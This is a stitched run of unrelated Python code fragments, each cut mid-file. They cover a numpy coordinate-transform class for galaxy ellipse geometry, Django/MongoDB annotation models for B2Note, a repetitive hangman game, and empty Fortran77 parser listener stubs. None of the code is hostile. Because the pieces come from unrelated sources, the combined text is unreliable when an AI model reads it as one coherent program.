relative to a reference on-sky position :math:`(x_0,y_0)`
relative to the center of the ellipse (galaxy center),
- :math:`(x_s,y_s)` is the on-sky position of :math:`(x_f,y_f)`
relative to the center of the ellipse, and
- :math:`(x_a,y_a)` is the Cartesian position of
:math:`(x_f,y_f)` in units of the semi-major axis.
This form is used such that :math:`{\mathbf A}` need only be defined
once per class instance.
The class also allows for inverse calculations, i.e., calculating
the focal-plane positions provide the semi-major axis coordinates.
In this case,
.. math::
{\mathbf C} = \left[
\begin{array}{rrrr}
\cos\psi & \sin\psi & -1 & 0 \\
-\sin\psi & \cos\psi & 0 & -1 \\
0 & 0 & \sin\phi_0 & \cos\phi_0 \\
0 & 0 & -\cos\phi_0 & \sin\phi_0
\end{array}
\right]
{\mathbf d} = \left[
\begin{array}{r}
-x_0 \\
-y_0 \\
x_a \\
y_a (1-\varepsilon)
\end{array}
\right]
such that
.. math::
{\mathbf f} = \left[
\begin{array}{r}
x_f \\
y_f \\
x_s \\
y_s
\end{array}
\right]
and :math:`{\mathbf f} = {\mathbf C}^{-1}\ {\mathbf d}`.
Args:
xc (float): Same as :math:`x_0`, defined above
yc (float): Same as :math:`y_0`, defined above
rot (float): Same as :math:`\psi`, defined above
pa (float): Same as :math:`\phi_0`, defined above
ell (float): Same as :math:`\varepsilon`, defined above
Attributes:
xc,yc (float,float): a reference on-sky position relative to the
center of the ellipse (galaxy center); same as
:math:`(x_0,y_0)` defined above
rot (float): Cartesian rotation of the focal-plane relative to
the sky-plane (+x toward East; +y toward North); same as
:math:`\psi` defined above
pa (float): On-sky position angle of the major axis of the
ellipse, defined as the angle from North through East and is
the same as :math:`\phi_0` defined above
ell (float): Ellipticity define as :math:`\varepsilon=1-b/a`,
based on the semi-minor to semi-major axis ratio
(:math:`b/a`) of the ellipse.
A (numpy.ndarray): The coordinate transformation matrix
Alu (numpy.ndarray): The **lu** array returned by
`scipy.linalg.lu_factor`_, which is used to calculate the LU
decomposition of :math:`{\mathbf A}`
Apiv (numpy.ndarray): The **piv** array returned by
`scipy.linalg.lu_factor`_, which is used to calculate the LU
decomposition of :math:`{\mathbf A}`
B (numpy.ndarray): The vector :math:`{\mathbf b}`, as defined
above, used to calculate :math:`{\mathbf x} = {\mathbf
A}^{-1}\ {\mathbf b}`
C (numpy.ndarray): The coordinate transformation matrix use for
the inverse operations
Clu (numpy.ndarray): The **lu** array returned by
`scipy.linalg.lu_factor`_, which is used to calculate the LU
decomposition of :math:`{\mathbf C}`
Cpiv (numpy.ndarray): The **piv** array returned by
`scipy.linalg.lu_factor`_, which is used to calculate the LU
decomposition of :math:`{\mathbf C}`
D (numpy.ndarray): The vector :math:`{\mathbf d}`, as defined
above, used to calculate :math:`{\mathbf f} = {\mathbf
C}^{-1}\ {\mathbf d}`
"""
def __init__(self, xc=None, yc=None, rot=None, pa=None, ell=None):
self.xc = 0.0 if xc is None else xc
self.yc = 0.0 if yc is None else yc
self.rot = 0.0 if rot is None else rot
self.pa = 0.0 if pa is None else pa
self.ell = 0.0 if ell is None else ell
self.A = None
self.Alu = None
self.Apiv = None
self._setA()
self.C = None
self.Clu = None
self.Cpiv = None
self.D = None
self._setC()
def _defined(self):
"""
Determine if the object is defined such that its methods can be
used to convert between coordinate systems.
"""
if self.A is None:
return False
if self.Alu is None:
return False
if self.Apiv is None:
return False
if self.C is None:
return False
if self.Clu is None:
return False
if self.Cpiv is None:
return False
return True
def _setA(self):
"""
Set the transformation matrix and calculate its LU
decomposition for forward operations.
"""
cosr = numpy.cos( numpy.radians(self.rot) )
sinr = numpy.sin( numpy.radians(self.rot) )
cosp = numpy.cos( numpy.radians(self.pa) )
sinp = numpy.sin( numpy.radians(self.pa) )
#cosi = numpy.cos( numpy.radians(self.inc) )
self.A = numpy.array([ [ 1.0, 0.0, 0.0, 0.0, 0.0, 0.0 ],
[ 0.0, 1.0, 0.0, 0.0, 0.0, 0.0 ],
[ cosr, sinr, -1.0, 0.0, 0.0, 0.0 ],
[ -sinr, cosr, 0.0, -1.0, 0.0, 0.0 ],
[ 0.0, 0.0, sinp, cosp, -1.0, 0.0 ],
[ 0.0, 0.0, -cosp, sinp, 0.0, self.ell-1. ] ])
self.Alu, self.Apiv = linalg.lu_factor(self.A)
def _get_B(self, x, y):
"""
Set the on-sky coordinate vector for forward operations.
Args:
x (`numpy.ndarray`_):
On-sky Cartesian coordinate.
y (`numpy.ndarray`_):
On-sky Cartesian coordinate.
Returns:
`numpy.ndarray`_: Array prepared for the matrix solution.
"""
return numpy.vstack((x.ravel(), y.ravel(), numpy.full(x.size, -self.xc, dtype=float),
numpy.full(x.size, -self.yc, dtype=float),
numpy.zeros(x.size, dtype=float),
numpy.zeros(x.size, dtype=float)))
def _setC(self):
"""
Set the transformation matrix and calculate its LU
decomposition for inverse operations.
"""
cosr = numpy.cos( numpy.radians(self.rot) )
sinr = numpy.sin( numpy.radians(self.rot) )
cosp = numpy.cos( numpy.radians(self.pa) )
sinp = numpy.sin( numpy.radians(self.pa) )
self.C = numpy.array([ [ cosr, sinr, -1.0, 0.0 ],
[ -sinr, cosr, 0.0, -1.0 ],
[ 0.0, 0.0, sinp, cosp ],
[ 0.0, 0.0, -cosp, sinp ] ])
self.Clu, self.Cpiv = linalg.lu_factor(self.C)
def _get_D(self, x, y):
"""
Set the semi-major-axis coordinate vector for inverse operations.
Args:
x (`numpy.ndarray`_):
Semi-major axis Cartesian coordinate.
y (`numpy.ndarray`_):
Semi-major axis Cartesian coordinate.
Returns:
`numpy.ndarray`_: Array prepared for the matrix solution.
"""
return numpy.vstack((numpy.full(x.size, -self.xc, dtype=float),
numpy.full(x.size, -self.yc, dtype=float),
x.ravel(), (1-self.ell)*y.ravel()))
# self.D = numpy.array([ -self.xc, -self.yc, x, (1-self.ell)*y ])
def _calculate_polar(self, x, y):
r"""
Calculate the polar coordinates (radius and azimuth) provided
the Cartesian semi-major-axis coordinates :math:`(x_a,y_a)`
using
.. math::
R &= \sqrt{x_a^2 + y_a^2} \\
\theta &= \tan^{-1}\left(\frac{-y_a}{x_a}\right)
Args:
x,y (array-like): The semi-major-axis Cartesian coordinates
:math:`(x_a,y_a)`.
Returns:
numpy.ndarray: The semi-major-axis polar coordinates:
:math:`R, \theta`.
"""
_x = numpy.atleast_1d(x)
_y = numpy.atleast_1d(y)
if _x.size != _y.size:
raise ValueError('X and Y arrays must have the same size')
R = numpy.sqrt( _x*_x + _y*_y)
theta = numpy.degrees( numpy.arctan2(-_y, _x) )
if hasattr(theta, '__len__'):
theta[theta < 0] += 360.
elif theta < 0:
theta += 360.
# Returned range in theta is -pi,pi: convert to 0,2pi
return R, theta
def _calculate_cartesian(self, r, theta):
r"""
Invert the calculation of the semi-major-axis polar coordinates
to calculate the semi-major-axis Cartesian coordinates
:math:`(x_a,y_a)` using
.. math::
x_a &= \pm R / \sqrt{1 + \tan^2\theta}\\
y_a &= -x_a\ \tan\theta
where :math:`x_a` is negative when :math:`\pi/2 \leq \theta <
3\pi/2`.
Args:
r,theta (array-like): The semi-major-axis polar coordinates
:math:`(R,\theta)`.
Returns:
numpy.ndarray: The semi-major-axis Cartesian coordinates:
:math:`x_a, y_a`.
"""
_r = numpy.atleast_1d(r)
_theta = numpy.atleast_1d(theta)
if _r.size != _theta.size:
raise ValueError('R and THETA arrays must have the same size')
tant = numpy.tan(numpy.radians(_theta))
xd = _r/numpy.sqrt(1.0 + numpy.square(tant))
if hasattr(xd, '__len__'):
| |
<gh_stars>0
from django.db import models
from djangotoolbox.fields import ListField, SetField, DictField, EmbeddedModelField
from django_mongodb_engine.contrib import MongoDBManager
# 20161115, <EMAIL>: reduce data model to fields curently in use by B2Note app.
#
# class CssStyleSheet(models.Model):
# type = models.CharField( max_length = 32,
# choices=(("CSS style sheet", "CssStylesheet"),), null=True )
# value = models.TextField( null= True )
#
#
# class RequestHeaderState(models.Model):
# type = models.CharField( max_length = 32,
# choices = (("HTTP request state","HttpRequestState"),) )
# value = models.TextField() # MUST have exactly 1 HTTP request headers in a single, complete string.
# refinedBy = ListField(EmbeddedModelField(), null=True) # MAY be 1 or more State or Selector.
#
#
# class TimeState(models.Model):
# type = models.CharField( max_length = 32,
# choices = (("Time state","TimeState"),) ) # oa:TimeState
# sourceDate = ListField( models.DateTimeField(), null=True ) # If provided then MUST NOT sourceDateStart nor sourceDateEnd.
# sourceDateStart = models.DateTimeField( null=True ) # MUST NOT if sourceDate, if provided then MUST sourceDateEnd.
# sourceDateEnd = models.DateTimeField( null=True ) # If provided then MUST sourceDateStart.
# # MUST be expressed in the xsd:dateTime format, MUST use the UTC timezone expressed as "Z".
# cached = ListField( models.CharField( max_length = 4096 ), null=True ) # oa:cachedSource
# refinedBy = ListField( EmbeddedModelField(), null=True ) # MAY be 1 or more State or Selector.
#
#
# class RangeSelector(models.Model):
# type = models.CharField(max_length=32,
# choices=(("Range selector", "RangeSelector"),)) # oa:DataPositionSelector
# startSelector = EmbeddedModelField() # Must be exactly 1 inclusive starting point
# endSelector = EmbeddedModelField() # Must be exactly 1 exclusive ending point of same class as startSelector
# refinedBy = ListField( EmbeddedModelField(), null=True )
#
#
# class SvgSelector(models.Model):
# type = models.CharField( max_length = 32,
# choices = (("SVG selector","SvgSelector"),) )
# value = models.TextField( null=True ) # MAY be exactly 1 then MUST be well formed SVG XML.
# refinedBy = ListField( EmbeddedModelField(), null=True )
#
#
# class DataPositionSelector(models.Model):
# type = models.CharField( max_length = 32,
# choices = (("Data position selector","DataPositionSelector"),) ) # oa:DataPositionSelector
# start = models.PositiveIntegerField() # oa:start
# end = models.PositiveIntegerField() # oa:end
# refinedBy = ListField( EmbeddedModelField(), null=True )
#
#
# class TextPositionSelector(models.Model):
# type = models.CharField( max_length = 32,
# choices = (("Text position selector","TextPositionSelector"),) ) # oa:TextPositionSelector
# start = models.PositiveIntegerField() # oa:start
# end = models.PositiveIntegerField() # oa:end
# # [0:2147483647] i.e. with upper-limit 16 bytes per character, max file size of 17179869176 bytes ~ 17 Gb
# refinedBy = ListField( EmbeddedModelField(), null=True )
#
#
# class TextQuoteSelector(models.Model):
# type = models.CharField( max_length = 32,
# choices = (("Text quote selector","TextQuoteSelector"),) ) # oa:TextQuoteSelector
# exact = models.TextField() # oa:exact
# prefix = models.CharField( max_length = 2048, null=True ) # oa:prefix
# suffix = models.CharField( max_length = 2048, null=True ) # oa:suffix
# refinedBy = ListField( EmbeddedModelField(), null=True )
#
#
# class XPathSelector(models.Model):
# type = models.CharField(max_length=32,
# choices=(("XPath selector", "XPathSelector"),) )
# value = models.CharField( max_length = 4096 )
# refinedBy = ListField( EmbeddedModelField(), null=True )
#
#
# class CssSelector(models.Model):
# type = models.CharField( max_length = 32,
# choices = (("CSS selector", "CssSelector"),))
# value = models.CharField( max_length = 4096 ) # CSS selection path to the Segment
# refinedBy = ListField( EmbeddedModelField(), null=True )
#
#
# class FragmentSelector(models.Model):
# type = models.CharField( max_length = 32,
# choices = (("Fragment selector","FragmentSelector"),)) # oa:FragmentSelector
# value = models.CharField( max_length = 4096 ) # rdf:value
# conformsTo = models.CharField( max_length = 256, null=True ) # dcterms:conformsTo
# refinedBy = ListField( EmbeddedModelField(), null=True )
#
#
# class SpecificResource(models.Model):
# jsonld_id = models.CharField( max_length = 4096, null=True )
# type = models.CharField( max_length = 256, null=True ) # (rdf:type) oa:SpecificResource
# source = EmbeddedModelField("ExternalResource") # (oa:hasSource)
# ASSESSING = "assessing"
# BOOKMARKING = "bookmarking"
# CLASSIFYING = "classifying"
# COMMENTING = "commenting"
# DESCRIBING = "describing"
# EDITING = "editing"
# HIGHLIGHTING = "highlighting"
# IDENTIFYING = "identifying"
# LINKING = "linking"
# MODERATING = "moderating"
# QUESTIONING = "questioning"
# REPLYING = "replying"
# TAGGING = "tagging"
# MOTIVATION_CHOICES = (
# (ASSESSING, "assessing"), # oa:assessing
# (BOOKMARKING, "bookmarking"), # oa:bookmarking
# (CLASSIFYING, "classifying"), # oa:classifying
# (COMMENTING, "commenting"), # oa:commenting
# (DESCRIBING, "describing"), # oa:describing
# (EDITING, "editing"), # oa:editing
# (HIGHLIGHTING, "highlighting"), # oa:highlighting
# (IDENTIFYING, "identifying"), # oa:identifying
# (LINKING, "linking"), # oa:linking
# (MODERATING, "moderating"), # oa:moderating
# (QUESTIONING, "questioning"), # oa:questioning
# (REPLYING, "replying"), # oa:replying
# (TAGGING, "tagging"), # oa:tagging
# )
# purpose = models.CharField( max_length = 256, choices=MOTIVATION_CHOICES, null=True )
# selector = ListField( EmbeddedModelField(), null=True ) # oa:hasSelector
# state = ListField( EmbeddedModelField(), null=True ) # oa:hasState
# styleClass = ListField( models.TextField(), null=True ) # oa:StyleClass
# renderedVia = ListField( EmbeddedModelField(), null=True ) # Examples show as if "Audience" class can be used as a placeholder here.
# scope = ListField( EmbeddedModelField(), null=True ) # oa:hasScope
#
#
# class Audience(models.Model):
# jsonld_id = models.CharField( max_length=4096, null=True )
# type = ListField( models.CharField( max_length = 256 ), null=True ) # SHOULD come from the schema.org class structure.
# props = DictField( null=True ) # prefixed schema.org's Audience classes
class Agent(models.Model):
#jsonld_id = models.CharField( max_length = 4096, null=True )
PERSON = 'Person'
ORGANISATION = 'Organization agent'
SOFTWARE = 'Software agent'
AGENT_CHOICES = (
(PERSON, 'Person'), # foaf:Person
(ORGANISATION, 'Organization'), # foaf:Organization
(SOFTWARE, 'Software'), # prov:SoftwareAgent
)
type = ListField( models.CharField( max_length = 32,
choices=AGENT_CHOICES), null=True )
name = ListField( models.CharField( max_length = 2048 ), null=True ) # foaf:name
nickname = models.CharField( max_length = 2048, null=True ) # foaf:nick
email = ListField( models.CharField(max_length = 2048), null=True ) # foaf:mbox
#email_sha1 = ListField( models.CharField(max_length = 2048), null=True ) # sha1 of "mailto:"+foaf:mbox
homepage = ListField( models.CharField(max_length = 4096), null=True ) # foaf:homepage
class SemanticTagSpecificResource(models.Model):
type = models.CharField( max_length = 256, null=True ) # (rdf:type) oa:SpecificResource
source = models.CharField( max_length = 4096 )
class SemanticTagTextualBody(models.Model):
type = models.CharField( max_length = 64 ) # rdf:type; oa:TextualBody
value = models.TextField() # oa:text
class SemanticTagBodySet(models.Model):
type = models.CharField( max_length = 32,
choices = (
("Holistic set of resources", "Composite"),
("Ordered list of resources", "List"),
("Set of independent resources", "Independents"),
))
items = ListField( EmbeddedModelField() ) # oa:item
ASSESSING = "assessing"
BOOKMARKING = "bookmarking"
CLASSIFYING = "classifying"
COMMENTING = "commenting"
DESCRIBING = "describing"
EDITING = "editing"
HIGHLIGHTING = "highlighting"
IDENTIFYING = "identifying"
LINKING = "linking"
MODERATING = "moderating"
QUESTIONING = "questioning"
REPLYING = "replying"
TAGGING = "tagging"
MOTIVATION_CHOICES = (
(ASSESSING, "assessing"), # oa:assessing
(BOOKMARKING, "bookmarking"), # oa:bookmarking
(CLASSIFYING, "classifying"), # oa:classifying
(COMMENTING, "commenting"), # oa:commenting
(DESCRIBING, "describing"), # oa:describing
(EDITING, "editing"), # oa:editing
(HIGHLIGHTING, "highlighting"), # oa:highlighting
(IDENTIFYING, "identifying"), # oa:identifying
(LINKING, "linking"), # oa:linking
(MODERATING, "moderating"), # oa:moderating
(QUESTIONING, "questioning"), # oa:questioning
(REPLYING, "replying"), # oa:replying
(TAGGING, "tagging"), # oa:tagging
)
purpose = models.CharField(max_length=256, choices=MOTIVATION_CHOICES, null=True)
#created = models.DateTimeField( auto_now_add=True, null=True ) # dcterms:created MUST xsd:dateTime SHOULD timezone.
#modified = models.DateTimeField( null=True ) # MUST xsd:dateTime with the UTC timezone expressed as "Z".
# class ResourceSet(models.Model):
# jsonld_id = models.CharField( max_length = 4096, null=True )
# type = models.CharField( max_length = 32,
# choices = (
# ("Holistic set of resources", "Composite"),
# ("Ordered list of resources", "List"),
# ("Set of independent resources", "Independents"),
# ))
# items = ListField( EmbeddedModelField() ) # oa:item
#
#
# class Choice(models.Model):
# jsonld_id = models.CharField( max_length = 4096, null=True )
# type = models.CharField( max_length = 32,
# choices = (("Ordered list to pick one from", "Choice"),) ) # oa:Choice
# items = ListField( EmbeddedModelField() ) # oa:memberList
class TextualBody(models.Model):
jsonld_id = models.CharField( max_length = 4096, null=True ) #"https://b2note.bsc.es/textualbody/" + mongo_uid
type = ListField( models.CharField( max_length = 64 ), null=True ) # rdf:type; oa:TextualBody
value = models.TextField() # oa:text
#language = ListField( models.CharField( max_length = 256 ), null=True ) # dc:language, [rfc5646]
#format = ListField( models.CharField( max_length = 256 ), null=True ) # dc:format, [rfc6838]
#processingLanguage = models.CharField( max_length = 256, null=True ) #
#LTR = "ltr"
#RTL = "rtl"
#AUTO = "auto"
#TEXT_DIRECTION_CHOICES = (
# (LTR, "ltr" ),
# (RTL, "rtl" ),
# (AUTO, "auto"),
#)
#textDirection = models.CharField( max_length = 32, choices=TEXT_DIRECTION_CHOICES, null=True )
ASSESSING = "assessing"
BOOKMARKING = "bookmarking"
CLASSIFYING = "classifying"
COMMENTING = "commenting"
DESCRIBING = "describing"
EDITING = "editing"
HIGHLIGHTING = "highlighting"
IDENTIFYING = "identifying"
LINKING = "linking"
MODERATING = "moderating"
QUESTIONING = "questioning"
REPLYING = "replying"
TAGGING = "tagging"
MOTIVATION_CHOICES = (
(ASSESSING, "assessing"), # oa:assessing
(BOOKMARKING, "bookmarking"), # oa:bookmarking
(CLASSIFYING, "classifying"), # oa:classifying
(COMMENTING, "commenting"), # oa:commenting
(DESCRIBING, "describing"), # oa:describing
(EDITING, "editing"), # oa:editing
(HIGHLIGHTING, "highlighting"), # oa:highlighting
(IDENTIFYING, "identifying"), # oa:identifying
(LINKING, "linking"), # oa:linking
(MODERATING, "moderating"), # oa:moderating
(QUESTIONING, "questioning"), # oa:questioning
(REPLYING, "replying"), # oa:replying
(TAGGING, "tagging"), # oa:tagging
)
purpose = models.CharField( max_length = 256, choices=MOTIVATION_CHOICES, null=True )
#creator = ListField( EmbeddedModelField("Agent"), null=True ) # dcterms:creator
#created = models.DateTimeField( auto_now_add=True, null=True ) # dcterms:created MUST xsd:dateTime SHOULD timezone.
#modified = models.DateTimeField( null=True ) # MUST xsd:dateTime with the UTC timezone expressed as "Z".
#modified = models.DateTimeField( auto_now=True, null=True ) # MUST xsd:dateTime with the UTC timezone expressed as "Z".
class ExternalSpecificResource(models.Model):
jsonld_id = models.CharField( max_length = 4096, null=True ) # file PID
type = models.CharField( max_length = 256, null=True ) # (rdf:type) oa:SpecificResource
source = models.CharField( max_length = 4096 ) # file URL (required)
class ExternalResource(models.Model):
jsonld_id = models.CharField( max_length = 4096 ) # can be IRI with fragment component
DATASET = "dataset"
IMAGE = "image"
VIDEO = "video"
SOUND = "sound"
TEXT = "text"
RESOURCE_TYPE_CHOICES = (
(DATASET, "Dataset"), # dctypes:Dataset
(IMAGE, "Image"), # dctypes:StillImage
(VIDEO, "Video"), # dctypes:MovingImage
(SOUND, "Audio"), # dctypes:Sound
(TEXT, "Text"), # dctypes:Text
)
type = ListField( models.CharField( max_length = 64, choices=RESOURCE_TYPE_CHOICES), null=True ) #rdf:class
#format = ListField( models.CharField( max_length = 256 ), null=True ) # dc:format, [rfc6838]
#language = ListField( models.CharField( max_length = 256 ), null=True ) # dc:language, [bcp47]
#processingLanguage = models.CharField( max_length = 256, null=True ) #
#LTR = "ltr"
#RTL = "rtl"
#AUTO = "auto"
#TEXT_DIRECTION_CHOICES = (
# (LTR, "ltr"),
# (RTL, "rtl"),
# (AUTO, "auto"),
#)
#textDirection = models.CharField( max_length = 32, choices=TEXT_DIRECTION_CHOICES, null=True )
#accessibility = ListField( models.CharField( max_length = 256 ), null=True ) # enumerated list of schema.org accessibilityFeature property
#creator = ListField( EmbeddedModelField("Agent"), null=True ) # dcterms:creator
#created = models.DateTimeField( auto_now_add=True, null=True ) # dcterms:created MUST xsd:dateTime SHOULD timezone.
#modified = models.DateTimeField( null=True ) # MUST xsd:dateTime with the UTC timezone expressed as "Z".
#modified = models.DateTimeField( auto_now=True, null=True ) # MUST xsd:dateTime with the UTC timezone expressed as "Z".
#rights = ListField( models.CharField( max_length=4096 ), null=True ) # MAY be then MUST be an IRI
#canonical = models.CharField( max_length=4096, null=True ) # IRI
#via = ListField( | |
and word[4] != "O" and word[4] != "o" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "o" + ", "
if guessChar == "P" or guessChar == "p" :
if word[1] == "P" or word[1] == "p" :
toGuess = toGuess[:1] + "p" + toGuess[2:]
if word[2] == "P" or word[2] == "p" :
toGuess = toGuess[:2] + "p" + toGuess[3:]
if word[3] == "P" or word[3] == "p" :
toGuess = toGuess[:3] + "p" + toGuess[4:]
if word[4] == "P" or word[4] == "p" :
toGuess = toGuess[:4] + "p" + toGuess[5:]
if word[1] != "P" and word[1] != "p" and word[2] != "P" and word[2] != "p" and word[3] != "P" and word[3] != "p" and word[4] != "P" and word[4] != "p" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "p" + ", "
if guessChar == "Q" or guessChar == "q" :
if word[1] == "Q" or word[1] == "q" :
toGuess = toGuess[:1] + "q" + toGuess[2:]
if word[2] == "Q" or word[2] == "q" :
toGuess = toGuess[:2] + "q" + toGuess[3:]
if word[3] == "Q" or word[3] == "q" :
toGuess = toGuess[:3] + "q" + toGuess[4:]
if word[4] == "Q" or word[4] == "q" :
toGuess = toGuess[:4] + "q" + toGuess[5:]
if word[1] != "Q" and word[1] != "q" and word[2] != "Q" and word[2] != "q" and word[3] != "Q" and word[3] != "q" and word[4] != "Q" and word[4] != "q" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "q" + ", "
if guessChar == "R" or guessChar == "r" :
if word[1] == "R" or word[1] == "r" :
toGuess = toGuess[:1] + "r" + toGuess[2:]
if word[2] == "R" or word[2] == "r" :
toGuess = toGuess[:2] + "r" + toGuess[3:]
if word[3] == "R" or word[3] == "r" :
toGuess = toGuess[:3] + "r" + toGuess[4:]
if word[4] == "R" or word[4] == "r" :
toGuess = toGuess[:4] + "r" + toGuess[5:]
if word[1] != "R" and word[1] != "r" and word[2] != "R" and word[2] != "r" and word[3] != "R" and word[3] != "r" and word[4] != "R" and word[4] != "r" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "r" + ", "
if guessChar == "S" or guessChar == "s" :
if word[1] == "S" or word[1] == "s" :
toGuess = toGuess[:1] + "s" + toGuess[2:]
if word[2] == "S" or word[2] == "s" :
toGuess = toGuess[:2] + "s" + toGuess[3:]
if word[3] == "S" or word[3] == "s" :
toGuess = toGuess[:3] + "s" + toGuess[4:]
if word[4] == "S" or word[4] == "s" :
toGuess = toGuess[:4] + "s" + toGuess[5:]
if word[1] != "S" and word[1] != "s" and word[2] != "S" and word[2] != "s" and word[3] != "S" and word[3] != "s" and word[4] != "S" and word[4] != "s" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "s" + ", "
if guessChar == "T" or guessChar == "t" :
if word[1] == "T" or word[1] == "t" :
toGuess = toGuess[:1] + "t" + toGuess[2:]
if word[2] == "T" or word[2] == "t" :
toGuess = toGuess[:2] + "t" + toGuess[3:]
if word[3] == "T" or word[3] == "t" :
toGuess = toGuess[:3] + "t" + toGuess[4:]
if word[4] == "T" or word[4] == "t" :
toGuess = toGuess[:4] + "t" + toGuess[5:]
if word[1] != "T" and word[1] != "t" and word[2] != "T" and word[2] != "t" and word[3] != "T" and word[3] != "t" and word[4] != "T" and word[4] != "t" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "t" + ", "
if guessChar == "U" or guessChar == "u" :
if word[1] == "U" or word[1] == "u" :
toGuess = toGuess[:1] + "u" + toGuess[2:]
if word[2] == "U" or word[2] == "u" :
toGuess = toGuess[:2] + "u" + toGuess[3:]
if word[3] == "U" or word[3] == "u" :
toGuess = toGuess[:3] + "u" + toGuess[4:]
if word[4] == "U" or word[4] == "u" :
toGuess = toGuess[:4] + "u" + toGuess[5:]
if word[1] != "U" and word[1] != "u" and word[2] != "U" and word[2] != "u" and word[3] != "U" and word[3] != "u" and word[4] != "U" and word[4] != "u" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "u" + ", "
if guessChar == "V" or guessChar == "v" :
if word[1] == "V" or word[1] == "v" :
toGuess = toGuess[:1] + "v" + toGuess[2:]
if word[2] == "V" or word[2] == "v" :
toGuess = toGuess[:2] + "v" + toGuess[3:]
if word[3] == "V" or word[3] == "v" :
toGuess = toGuess[:3] + "v" + toGuess[4:]
if word[4] == "V" or word[4] == "v" :
toGuess = toGuess[:4] + "v" + toGuess[5:]
if word[1] != "V" and word[1] != "v" and word[2] != "V" and word[2] != "v" and word[3] != "V" and word[3] != "v" and word[4] != "V" and word[4] != "v" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "v" + ", "
if guessChar == "W" or guessChar == "w" :
if word[1] == "W" or word[1] == "w" :
toGuess = toGuess[:1] + "w" + toGuess[2:]
if word[2] == "W" or word[2] == "w" :
toGuess = toGuess[:2] + "w" + toGuess[3:]
if word[3] == "W" or word[3] == "w" :
toGuess = toGuess[:3] + "w" + toGuess[4:]
if word[4] == "W" or word[4] == "w" :
toGuess = toGuess[:4] + "w" + toGuess[5:]
if word[1] != "W" and word[1] != "w" and word[2] != "W" and word[2] != "w" and word[3] != "W" and word[3] != "w" and word[4] != "W" and word[4] != "w" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "w" + ", "
if guessChar == "X" or guessChar == "x" :
if word[1] == "X" or word[1] == "x" :
toGuess = toGuess[:1] + "x" + toGuess[2:]
if word[2] == "X" or word[2] == "x" :
toGuess = toGuess[:2] + "x" + toGuess[3:]
if word[3] == "X" or word[3] == "x" :
toGuess = toGuess[:3] + "x" + toGuess[4:]
if word[4] == "X" or word[4] == "x" :
toGuess = toGuess[:4] + "x" + toGuess[5:]
if word[1] != "X" and word[1] != "x" and word[2] != "X" and word[2] != "x" and word[3] != "X" and word[3] != "x" and word[4] != "X" and word[4] != "x" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "x" + ", "
if guessChar == "Y" or guessChar == "y" :
if word[1] == "Y" or word[1] == "y" :
toGuess = toGuess[:1] + "y" + toGuess[2:]
if word[2] == "Y" or word[2] == "y" :
toGuess = toGuess[:2] + "y" + toGuess[3:]
if word[3] == "Y" or word[3] == "y" :
toGuess = toGuess[:3] + "y" + toGuess[4:]
if word[4] == "Y" or word[4] == "y" :
toGuess = toGuess[:4] + "y" + toGuess[5:]
if word[1] != "Y" and word[1] != "y" and word[2] != "Y" and word[2] != "y" and word[3] != "Y" and word[3] != "y" and word[4] != "Y" and word[4] != "y" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "y" + ", "
if guessChar == "Z" or guessChar == "z" :
if word[1] == "Z" or word[1] == "z" :
toGuess = toGuess[:1] + "z" + toGuess[2:]
if word[2] == "Z" or word[2] == "z" :
toGuess = toGuess[:2] + "z" + toGuess[3:]
if word[3] == "Z" or word[3] == "z" :
toGuess = toGuess[:3] + "z" + toGuess[4:]
if word[4] == "Z" or word[4] == "z" :
toGuess = toGuess[:4] + "z" + toGuess[5:]
if word[1] != "Z" and word[1] != "z" and word[2] != "Z" and word[2] != "z" and word[3] != "Z" and word[3] != "z" and word[4] != "Z" and word[4] != "z" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "z" + ", "
if numberOfErrors == 0 :
print("\t___________")
print("\t| |")
print("\t|")
print("\t|")
print("\t|")
print("\t|")
print("\t|")
if numberOfErrors == 1 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t|")
print("\t|")
print("\t|")
print("\t|")
if numberOfErrors == 2 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t| |")
print("\t|")
print("\t|")
print("\t|")
if numberOfErrors == 3 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t| /|")
print("\t|")
print("\t|")
print("\t|")
if numberOfErrors == 4 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t| /|\\")
print("\t|")
print("\t|")
print("\t|")
if numberOfErrors == 5 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t| /|\\")
print("\t| / ")
print("\t|")
print("\t|")
if numberOfErrors == 6 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t| /|\\")
print("\t| / \\")
print("\t|")
print("\t|")
print("\nYou lose! GAME OVER\n")
print("The answer was \"" + word + "\"")
loser = True
if not loser :
print("\n\tWord: " + toGuess)
print("\tMisses: " + wrongChars)
if "_" in toGuess and not loser :
guessChar = ""
while not guessChar.isalpha() :
guessChar | |
# Enter a parse tree produced by Fortran77Parser#controlFmt.
def enterControlFmt(self, ctx:Fortran77Parser.ControlFmtContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlFmt.
def exitControlFmt(self, ctx:Fortran77Parser.ControlFmtContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlUnit.
def enterControlUnit(self, ctx:Fortran77Parser.ControlUnitContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlUnit.
def exitControlUnit(self, ctx:Fortran77Parser.ControlUnitContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlRec.
def enterControlRec(self, ctx:Fortran77Parser.ControlRecContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlRec.
def exitControlRec(self, ctx:Fortran77Parser.ControlRecContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlEnd.
